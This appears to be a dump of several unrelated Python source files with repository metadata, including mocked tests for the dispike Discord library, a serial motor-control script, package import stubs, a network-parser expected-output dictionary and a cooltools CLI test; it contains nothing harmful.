        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
    ).mock(return_value=Response(200, json=malformed))
    with pytest.raises(ValidationError):
        dispike_object.get_commands(
            guild_only=True, guild_id_passed="EXAMPLE_GUILD"
        )
@pytest.fixture
def example_edit_command():
    """A minimal DiscordCommand: one required USER option with one choice."""
    option = CommandOption(
        name="exampleOption",
        type=CommandTypes.USER,
        description="exampleOptionDescription",
        required=True,
        choices=[CommandChoice(name="test", value="value")],
    )
    return DiscordCommand(
        name="exampleCommand",
        description="exampleCommandDescription",
        options=[option],
    )
@respx.mock
def test_bulk_edit_command_guild_only(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """Bulk-editing guild commands (PUT) returns a list of DiscordCommand
    objects mirroring the submitted commands."""
    respx.put(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
    ).mock(
        return_value=Response(200, json=[example_edit_command.dict()] * 2)
    )
    edited = dispike_object.edit_command(
        new_command=[example_edit_command, example_edit_command],
        guild_only=True,
        bulk=True,
        guild_id_passed="EXAMPLE_GUILD",
    )
    assert isinstance(edited, list)
    assert len(edited) == 2
    for command in edited:
        assert isinstance(command, DiscordCommand)
        assert command.id == example_edit_command.id
        assert command.name == example_edit_command.name
@respx.mock
def test_bulk_edit_command_globally(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """Bulk-editing global commands (PATCH) returns a list of
    DiscordCommand objects mirroring the submitted command."""
    respx.patch("https://discord.com/api/v8/applications/APPID/commands").mock(
        return_value=Response(200, json=[example_edit_command.dict()] * 2)
    )
    edited = dispike_object.edit_command(
        new_command=example_edit_command, bulk=True
    )
    assert isinstance(edited, list)
    assert len(edited) == 2
    for command in edited:
        assert isinstance(command, DiscordCommand)
        assert command.id == example_edit_command.id
        assert command.name == example_edit_command.name
@respx.mock
def test_single_edit_command_globally(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """Editing a single global command returns the edited DiscordCommand."""
    respx.patch("https://discord.com/api/v8/applications/APPID/commands").mock(
        return_value=Response(200, json=example_edit_command.dict())
    )
    edited = dispike_object.edit_command(new_command=example_edit_command)
    assert isinstance(edited, DiscordCommand), type(edited)
    assert edited.id == example_edit_command.id
    assert edited.name == example_edit_command.name
@respx.mock
def test_single_edit_command_guild_only(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """Editing a single guild command by id returns the edited
    DiscordCommand."""
    respx.patch(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
    ).mock(
        return_value=Response(200, json=example_edit_command.dict())
    )
    edited = dispike_object.edit_command(
        new_command=example_edit_command,
        command_id=1234,
        guild_only=True,
        guild_id_passed="EXAMPLE_GUILD",
    )
    assert isinstance(edited, DiscordCommand)
    assert edited.id == example_edit_command.id
    assert edited.name == example_edit_command.name
@respx.mock
def test_delete_command_guild_only(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """Deleting a guild command succeeds (returns True) on a 204."""
    respx.delete(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
    ).mock(
        return_value=Response(204, json=example_edit_command.dict())
    )
    deleted = dispike_object.delete_command(
        command_id=1234,
        guild_only=True,
        guild_id_passed="EXAMPLE_GUILD",
    )
    assert deleted == True
@respx.mock
def test_failed_delete_command_guild_only(
    dispike_object: Dispike, example_edit_command: DiscordCommand
):
    """A 500 while deleting a guild command raises DiscordAPIError."""
    respx.delete(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
    ).mock(
        return_value=Response(500, json=example_edit_command.dict())
    )
    with pytest.raises(DiscordAPIError):
        dispike_object.delete_command(
            command_id=1234,
            guild_only=True,
            guild_id_passed="EXAMPLE_GUILD",
        )
@respx.mock
def test_delete_command_globally(
    dispike_object: Dispike,
):
    """Deleting a global command succeeds (returns True) on a 204."""
    respx.delete("https://discord.com/api/v8/applications/APPID/commands/1234").mock(
        return_value=Response(204)
    )
    deleted = dispike_object.delete_command(command_id=1234)
    assert deleted == True
@respx.mock
def test_failed_delete_command_globally(
    dispike_object: Dispike,
):
    """A 500 while deleting a global command raises DiscordAPIError."""
    respx.delete("https://discord.com/api/v8/applications/APPID/commands/1234").mock(
        return_value=Response(500)
    )
    with pytest.raises(DiscordAPIError):
        dispike_object.delete_command(command_id=1234)
def test_get_commands_invalid_guild_id_passed(dispike_object: Dispike):
    # guild_only=True without guild_id_passed is a caller error: the client
    # must raise TypeError before any HTTP request is attempted.
    with pytest.raises(TypeError):
        dispike_object.get_commands(guild_only=True)
| 31.356796 | 90 | 0.557164 | 1,214 | 12,919 | 5.658155 | 0.101318 | 0.086475 | 0.073373 | 0.03261 | 0.855146 | 0.848158 | 0.834037 | 0.816276 | 0.803319 | 0.789052 | 0 | 0.025364 | 0.334701 | 12,919 | 411 | 91 | 31.43309 | 0.773822 | 0 | 0 | 0.657534 | 0 | 0.008219 | 0.189721 | 0.003793 | 0 | 0 | 0 | 0 | 0.060274 | 1 | 0.046575 | false | 0.021918 | 0.027397 | 0.00274 | 0.079452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
90c98e48c5568b2f961ffc671df39b928cf3dfb2 | 18 | py | Python | lib/assets/Lib/browser/svg.py | s6007589/cafe-grader-web | 18a993801c698fb7b7ec6ae5f4b67920503cb242 | [
"MIT"
] | 5,926 | 2015-01-01T07:45:08.000Z | 2022-03-31T12:34:38.000Z | lib/assets/Lib/browser/svg.py | it56660024/cafe-grader-web | e9a1305fd62e79e54f6961f97ddc5cd57bafd73c | [
"MIT"
] | 1,728 | 2015-01-01T01:09:12.000Z | 2022-03-30T23:25:22.000Z | lib/assets/Lib/browser/svg.py | it56660024/cafe-grader-web | e9a1305fd62e79e54f6961f97ddc5cd57bafd73c | [
"MIT"
] | 574 | 2015-01-02T01:36:10.000Z | 2022-03-26T10:18:48.000Z | from _svg import * | 18 | 18 | 0.777778 | 3 | 18 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
90c9a5a0a3fe6878b14ad82637eb61fac7c3acb9 | 1,448 | py | Python | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | import serial
import numpy as np
import time
# Module-level serial handle shared by all motor-command helpers below.
# NOTE(review): the numeric port argument (3) relies on legacy pyserial's
# 0-based device indexing (COM4 on Windows) — confirm against the deployment.
ser = serial.Serial(3, 9600)
# Reference frames (byte 6 selects the action: 0x02 fwd, 0x01 back, 0x03 stop):
# {0xBA,0x01,0xEA,0x60,0x01,0x03,0x02,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
#define DEFAULT_BACKWARD_BYTE {0xBA,0x01,0xEA,0x60,0x01,0x03,0x01,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
#define DEFAULT_STOP_BYTE {0xBA,0x01,0xEA,0x60,0x01,0x03,0x03,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
def forawrd(deviceID):
    """Send the 'forward' command frame (action byte 0x02) to deviceID."""
    frame = [0xBA, 0x01, 0x0A, 0x60, deviceID, 0x03, 0x02, 0x30,
             0x00, 0x63, 0x9C, 0x00, 0x0A, 0x02, 0x26, 0xA1, 0xFE]
    # Second-to-last byte carries the XOR checksum of the first 15 bytes.
    frame[-2] = crc(frame[:15])
    ser.write(frame)
def backward(deviceID):
    """Send the 'backward' command frame (action byte 0x01) to deviceID."""
    frame = [0xBA, 0x01, 0x0A, 0x60, deviceID, 0x03, 0x01, 0x30,
             0x00, 0x63, 0x9C, 0x00, 0x0A, 0x02, 0x26, 0xA1, 0xFE]
    # Second-to-last byte carries the XOR checksum of the first 15 bytes.
    frame[-2] = crc(frame[:15])
    ser.write(frame)
def stop(deviceID):
    """Send the 'stop' command frame (action byte 0x03) to deviceID."""
    frame = [0xBA, 0x01, 0x0A, 0x60, deviceID, 0x03, 0x03, 0x30,
             0x00, 0x63, 0x9C, 0x00, 0x0A, 0x02, 0x26, 0xA1, 0xFE]
    # Second-to-last byte carries the XOR checksum of the first 15 bytes.
    frame[-2] = crc(frame[:15])
    ser.write(frame)
def crc(bytes):
    """XOR-fold the given byte sequence into one checksum value (0 if empty)."""
    checksum = 0
    for value in bytes:
        checksum = checksum ^ value
    return checksum
if __name__ == '__main__':
    # Smoke test (Python 2): drive motors with device ids 2..4 forward,
    # then backward, then stop, reading one response byte per device from
    # the serial port after each batch of commands.
    for i in range(2,5):
        forawrd(i)
    print 'forward'
    for i in range(2,5):
        print repr(ser.read())
    for i in range(2,5):
        backward(i)
    print 'backward'
    for i in range(2,5):
        print repr(ser.read())
    print 'stop'
    for i in range(2,5):
        stop(i)
    for i in range(2,5):
        print repr(ser.read())
90d519ff9ada26eeac116859a06ab8b99b9ad311 | 151 | py | Python | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | null | null | null | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | 7 | 2021-11-15T01:12:01.000Z | 2022-03-21T12:18:17.000Z | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | null | null | null | __all__ = ["Base", "init_db", "get_db"]
from chatbot.db.base import Base
from chatbot.db.init_db import init_db
from chatbot.db.session import get_db
| 25.166667 | 39 | 0.768212 | 27 | 151 | 3.962963 | 0.333333 | 0.168224 | 0.364486 | 0.280374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119205 | 151 | 5 | 40 | 30.2 | 0.804511 | 0 | 0 | 0 | 0 | 0 | 0.112583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
291a5da89219a9f17ee4501dc887748d850406ee | 236 | py | Python | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 107 | 2015-10-13T16:03:21.000Z | 2021-11-08T10:53:07.000Z | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 73 | 2015-10-14T17:27:10.000Z | 2018-10-01T14:32:44.000Z | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 36 | 2015-10-14T17:13:20.000Z | 2021-10-05T19:41:10.000Z | from encoders import JSONEncoder, LocalJSONEncoder
from encoders import HexEncoder
from encoders import IdentityEncoder
from protobuf import ProtobufObjectEncoder
from protobuf import RecordEncoder
from protobuf import HexRecordEncoder
| 33.714286 | 50 | 0.889831 | 25 | 236 | 8.4 | 0.44 | 0.171429 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105932 | 236 | 6 | 51 | 39.333333 | 0.995261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
291cbae2ed8a5722824e74e280fb1efd55088add | 803 | py | Python | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | 2 | 2020-06-17T01:37:58.000Z | 2021-05-16T22:27:26.000Z | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | null | null | null | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | 3 | 2020-04-12T22:11:02.000Z | 2021-04-09T03:05:11.000Z | from boundingbox_art.cvdrawtext.cvdrawtext import CvDrawText
from boundingbox_art.bba_rotate_dotted_ring3 import bba_rotate_dotted_ring3
from boundingbox_art.bba_black_ring_wa import bba_black_ring_wa
from boundingbox_art.bba_translucent_shape import bba_translucent_rectangle
from boundingbox_art.bba_translucent_shape import bba_translucent_circle
from boundingbox_art.bba_translucent_shape import bba_translucent_rectangle_fill1
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle_mask
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle_fix
from boundingbox_art.bba_square_obit import bba_square_obit
from boundingbox_art.bba_annotation_line import bba_annotation_line
| 66.916667 | 82 | 0.930262 | 126 | 803 | 5.373016 | 0.214286 | 0.243722 | 0.292467 | 0.310192 | 0.562777 | 0.562777 | 0.562777 | 0.562777 | 0.562777 | 0.478582 | 0 | 0.003953 | 0.054795 | 803 | 11 | 83 | 73 | 0.888011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2929e60b559d75240290456315c2fc4b57e36cbc | 597 | py | Python | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2019-09-20T08:03:47.000Z | 2021-05-10T11:02:09.000Z | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK_ML | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK_ML | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | from LAMARCK_ML.individuals.implementations.networkIndividualInterface import NetworkIndividualInterface
from LAMARCK_ML.individuals.implementations.classifierIndividualOPACDG import ClassifierIndividualOPACDG
from LAMARCK_ML.individuals.implementations.classifierIndividualACDG import ClassifierIndividualACDG
from LAMARCK_ML.individuals.implementations.graphLayoutIndividual import GraphLayoutIndividual
from LAMARCK_ML.individuals.implementations.cartesianIndividual import CartesianIndividual
from LAMARCK_ML.individuals.implementations.weightAgnosticIndividual import WeightAgnosticIndividual | 99.5 | 104 | 0.931323 | 48 | 597 | 11.458333 | 0.25 | 0.12 | 0.141818 | 0.261818 | 0.425455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038526 | 597 | 6 | 105 | 99.5 | 0.958188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2940b2aef3c04dd949a196925c3aa166675f3f2e | 6,576 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | expected_output = {
    # Expected parse of "show isis rib" for this golden output: one IS-IS tag
    # ("1") with a single /32 prefix reachable via three SR tunnels and one
    # physical interface (which also carries a repair path).
    "tag": {
        "1": {
            "prefix": {
                "6.6.6.6": {
                    "subnet": "32",
                    "prefix_attr": {
                        "x_flag": False,
                        "r_flag": False,
                        "n_flag": True
                    },
                    "source_router_id": "6.6.6.6",
                    "prefix_sid_index": 61,
                    "sid_bound_attribute": "SR_POLICY",
                    # NOTE(review): single-quoted key below; every other key in
                    # this literal is double-quoted.
                    'strict_sid_bound_attribute_te': False,
                    "via_interface": {
                        "Tunnel65536": {
                            "distance": 115,
                            "route_type": "L2",
                            "metric": 50,
                            "via_ip": "6.6.6.6",
                            "src_ip": "6.6.6.6",
                            "tag": "0",
                            "lsp": {
                                "next_hop_lsp_index": 115,
                                "rtp_lsp_index": 115,
                                "rtp_lsp_version": 220
                            },
                            "prefix_attr": {
                                "x_flag": False,
                                "r_flag": False,
                                "n_flag": True
                            },
                            "srgb": 100000,
                            "srgb_range": 30001,
                            "prefix_sid_index": 61,
                            "non_strict_sid_flags": {
                                "r_flag": False,
                                "n_flag": True,
                                "p_flag": False,
                                "e_flag": False,
                                "v_flag": False,
                                "l_flag": False
                            },
                            "label": "implicit-null",
                            "path_attribute": "SR_POLICY",
                            "installed": True
                        },
                        "Tunnel4001": {
                            "distance": 115,
                            "route_type": "L2",
                            "metric": 50,
                            "via_ip": "199.1.1.2",
                            "src_ip": "6.6.6.6",
                            "tag": "0",
                            "lsp": {
                                "next_hop_lsp_index": 2,
                                "rtp_lsp_index": 115,
                                "rtp_lsp_version": 220
                            },
                            "srgb": 100000,
                            "srgb_range": 30001,
                            "prefix_sid_index": 61,
                            "non_strict_sid_flags": {
                                "r_flag": False,
                                "n_flag": True,
                                "p_flag": False,
                                "e_flag": False,
                                "v_flag": False,
                                "l_flag": False
                            },
                            "label": "100061",
                            "path_attribute": "ALT",
                            "installed": True
                        },
                        "Tunnel4002": {
                            "distance": 115,
                            "route_type": "L2",
                            "metric": 50,
                            "via_ip": "199.1.2.2",
                            "src_ip": "6.6.6.6",
                            "tag": "0",
                            "lsp": {
                                "next_hop_lsp_index": 2,
                                "rtp_lsp_index": 115,
                                "rtp_lsp_version": 220
                            },
                            "srgb": 100000,
                            "srgb_range": 30001,
                            "prefix_sid_index": 61,
                            "non_strict_sid_flags": {
                                "r_flag": False,
                                "n_flag": True,
                                "p_flag": False,
                                "e_flag": False,
                                "v_flag": False,
                                "l_flag": False
                            },
                            "label": "100061",
                            "path_attribute": "ALT",
                            "installed": True
                        },
                        "GigabitEthernet0/3/1": {
                            "distance": 115,
                            "route_type": "L2",
                            "metric": 50,
                            "via_ip": "12.12.12.2",
                            "src_ip": "6.6.6.6",
                            "tag": "0",
                            "lsp": {
                                "next_hop_lsp_index": 3,
                                "rtp_lsp_index": 115,
                                "rtp_lsp_version": 220
                            },
                            "srgb": 100000,
                            "srgb_range": 30001,
                            "prefix_sid_index": 61,
                            "non_strict_sid_flags": {
                                "r_flag": False,
                                "n_flag": True,
                                "p_flag": False,
                                "e_flag": False,
                                "v_flag": False,
                                "l_flag": False
                            },
                            # NOTE(review): this label string carries a trailing
                            # comma ("100061,") unlike the other entries —
                            # confirm the parser output really includes it.
                            "label": "100061,",
                            "path_attribute": "ALT",
                            "installed": True,
                            "repair_path": {
                                "ip": "199.1.2.2",
                                "interface": "Tunnel4002",
                                "metric": 50,
                                "rtp_lsp_index": 115,
                                "attributes": {
                                    "DS": True,
                                    "LC": True,
                                    "NP": True,
                                    "PP": True,
                                    "SR": True
                                },
                                "lfa_type": "local LFA",
                                "label": "100061"
                            }
                        }
                    }
                }
            }
        }
    }
} | 43.84 | 59 | 0.236466 | 389 | 6,576 | 3.694087 | 0.200514 | 0.150313 | 0.029228 | 0.019485 | 0.751566 | 0.740431 | 0.740431 | 0.740431 | 0.719555 | 0.670842 | 0 | 0.099314 | 0.667731 | 6,576 | 150 | 60 | 43.84 | 0.558352 | 0 | 0 | 0.62 | 0 | 0 | 0.195226 | 0.004409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
294e53d63b3bdbd81cc5da2913296a30713d53c4 | 72 | py | Python | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 19 | 2020-08-20T15:05:10.000Z | 2021-08-17T19:31:07.000Z | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 2 | 2019-10-31T13:29:05.000Z | 2021-08-12T17:32:32.000Z | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 4 | 2020-08-21T07:39:25.000Z | 2021-03-10T08:10:43.000Z | from .. import _distance_zxy
# load sub-packages
from . import calling
| 14.4 | 28 | 0.763889 | 10 | 72 | 5.3 | 0.8 | 0.377358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 72 | 4 | 29 | 18 | 0.883333 | 0.236111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4654ae24f1b573f807e6647c42ae7f821dc0e444 | 96 | py | Python | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/82/40/f8/b5f11f4563ec106be01c72716662995d4bc1cd5546cf7bf90bf30888e1 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.447917 | 0 | 96 | 1 | 96 | 96 | 0.447917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
469517a65988436579ac561db9caa99593dec904 | 86 | py | Python | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
@author : xiaowu
@date : 2020/04/16 17:31:48
'''
| 14.333333 | 32 | 0.465116 | 12 | 86 | 3.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 0.267442 | 86 | 5 | 33 | 17.2 | 0.396825 | 0.883721 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
469b28d3979aae6b835d1242e5434b852fca3a81 | 39 | py | Python | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | from app.seed import seed_db
# One-shot script entry point: populate the database via app.seed.seed_db().
seed_db()
| 13 | 28 | 0.794872 | 8 | 39 | 3.625 | 0.625 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 39 | 2 | 29 | 19.5 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d3b83f41af662842fdacb61f7695a2fe6f7542e7 | 3,006 | py | Python | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | import os.path as op
from click.testing import CliRunner
from cooltools.cli import cli
def test_call_dots_cli(request, tmpdir):
    """Run `cooltools dots` without an explicit view and expect failure.

    The viewframe inferred from the cooler does not correspond to the
    chrom-named toy expected table, so the command must exit non-zero.
    """
    data_dir = request.fspath.dirname
    cool_path = op.join(data_dir, "data/CN.mm9.1000kb.cool")
    expected_path = op.join(data_dir, "data/CN.mm9.toy_expected.chromnamed.tsv")
    prefix = op.join(tmpdir, "test.dots")

    args = [
        "dots",
        "-p", 1,
        "--kernel-width", 2,
        "--kernel-peak", 1,
        "--tile-size", 60_000_000,
        "--max-loci-separation", 100_000_000,
        "--out-prefix", prefix,
        cool_path,
        expected_path,
    ]
    outcome = CliRunner().invoke(cli, args)

    # Viewframe interpreted from the cooler does not match toy_expected,
    # so the CLI is expected to fail.
    assert outcome.exit_code == 1
def test_call_dots_view_cli(request, tmpdir):
    """Run `cooltools dots` with an explicit --view and expect success.

    call-dots requires a ucsc-named expected table and view.
